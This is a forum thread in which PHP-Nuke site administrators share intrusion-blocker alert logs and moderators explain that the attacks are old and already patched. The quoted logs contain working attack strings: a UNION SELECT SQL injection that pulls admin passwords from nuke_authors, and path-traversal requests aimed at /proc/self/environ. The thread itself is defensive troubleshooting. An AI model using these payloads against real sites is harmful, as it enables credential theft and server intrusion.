Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
Doulos
Life Cycles Becoming CPU Cycles


Joined: Jun 06, 2005
Posts: 618

PostPosted: Fri Jan 19, 2007 11:49 pm Reply with quote

Twice today I got this in my email (second time had different IP address):

Quote:
Date & Time: 2007-01-19 18:26:32 CST GMT -0600
Blocked IP: 64.251.10.133
User ID: Anonymous (1)
Reason: Abuse-CLike

User Agent: libwww-perl/5.803
Query String: clanfga.com/modules.php?

name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Get String: clanfga.com/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors


Post String: clanfga.com/modules.php
Forwarded For: none
Client IP: none
Remote Address: 64.251.10.133
Remote Port: 34935
Request Method: GET




Is this something I need to worry about? Never had anyone blocked for Abuse-CLike before.
 
View user's profile Send private message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Sat Jan 20, 2007 1:15 am Reply with quote

The block occured because someone used a union attack in an atempt to retrieve the admins user/password. Sentinel will protect you from these types of attack.
 
View user's profile Send private message Send e-mail
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Jan 21, 2007 12:51 am Reply with quote

Yep this is a known (old) vulnerablilty. Don't worry about it, if you are up-to-date with patches and Sentinel, you are fine.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
warren-the-ape
Worker
Worker


Joined: Nov 19, 2007
Posts: 196
Location: Netherlands

PostPosted: Sat Jan 12, 2008 2:40 pm Reply with quote

Got this one today as well. Our 1st Clike attack Cool

This dude (IP:83.20.148.210, email; Only registered users can see links on this board! Get registered or login!) even registred on our website/forum..

Code:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15


Query String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors

Get String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors

Post String: website.com/modules.php


But are these attacks already blocked by a patched php-nuke version?
Cause when installing NS i remembered seeing some 'Union' code in some of the nuke files.
 
View user's profile Send private message
evaders99
PostPosted: Sat Jan 12, 2008 11:18 pm Reply with quote

Oh yea this is an old one. It is patched already
 
grmm
New Member
New Member


Joined: Nov 15, 2008
Posts: 16
Location: Idaho, USA

PostPosted: Thu Jun 03, 2010 7:02 am Reply with quote

Is this normal...

These seem to come in clusters of 4 or 5, always happen in the middle of the night, are occurring more and more frequently, and each IP is listed twice when I check my emails every morning.

Last night I had five, and the email notices look like this:

Blocked abuse for 94.198.96*
Blocked abuse for 94.198.96*
Blocked abuse for 209.188.90.*
Blocked abuse for 209.188.90.*
Blocked abuse for 174.123.39.*
Blocked abuse for 174.123.39.*
Blocked abuse for 67.18.167.*
Blocked abuse for 67.18.167.*
Blocked abuse for 74.200.76.*
Blocked abuse for 74.200.76.*

I did a search on the IP's in NukeSintenial and they are in fact all blocked now.

Thanks
 
View user's profile Send private message Visit poster's website
Guardian2003
PostPosted: Thu Jun 03, 2010 12:31 pm Reply with quote

Yes it's perfectly normal
 
snype
Regular
Regular


Joined: Aug 12, 2008
Posts: 58

PostPosted: Thu Jun 03, 2010 12:54 pm Reply with quote

5 thats not bad wait till you are getting 100s a week i opened my emails yesterday first time for a week and received over 500 of these in the end my email program had to close the connection to the host and i had to mass delete them then sync my emails again
 
View user's profile Send private message
grmm
PostPosted: Thu Jun 03, 2010 1:57 pm Reply with quote

Thanks Guardian, thanks Snype.

"100s a week" Shocked, I kinda freaked out when they first started showing up, I feel better now. lol
 
hicuxunicorniobestbuildpc
Life Cycles Becoming CPU Cycles


Joined: Aug 13, 2009
Posts: 967
Location: Netherland

PostPosted: Wed Jun 09, 2010 1:12 am Reply with quote

I am getting this

Code:
Script Name: /modules.php

Query String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0


Code:
Script Name: /modules.php

Query String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0



it looks like they are using the same code attack for any module.
 
View user's profile Send private message Visit poster's website
spasticdonkey
RavenNuke(tm) Development Team


Joined: Dec 02, 2006
Posts: 1692
Location: Texas, USA

PostPosted: Wed Jun 09, 2010 6:29 am Reply with quote

yes that's some boneheads trying to attack the wrong gCalendar Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message Visit poster's website
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Sat Jun 12, 2010 7:14 am Reply with quote

School's out for many and so the Script Kiddies are back at it in force. Wink

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Doulos
PostPosted: Sun Jul 08, 2012 8:23 am Reply with quote

Why would this cause a CLike block?????

Quote:
Reason: Abuse-CLike
Script Name: /rnxhr.php
Query String: name=Your_Account&file=public/userAvailability&ya_username=monkeyove
Get String: &name=Your_Account&file=public/userAvailability&ya_username=monkeyove
 
montego
PostPosted: Sun Jul 08, 2012 9:17 am Reply with quote

You are right. I cannot see how this string got flagged as such. Was it a one-off or can you replicate it?
 
Doulos
PostPosted: Mon Jul 09, 2012 6:50 am Reply with quote

I only checked the YA module to make sure it was working properly. This person was blocked a couple times trying to use invalid characters in his name during registration.

I just successfully registered a user with that name. I don't get it.
 
montego
PostPosted: Tue Jul 10, 2012 7:27 am Reply with quote

Doulos wrote:
invalid characters in his name


Sounds like he was stopped by that check and maybe the NukeSentinel(tm) block was a different issue? Invalid characters in the name will definitely stop registration.
 
Doulos
PostPosted: Wed Jul 11, 2012 5:46 am Reply with quote

IP tracking doesn't even show the IP address shown in the NS block email. I will check the log to see what I can see.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©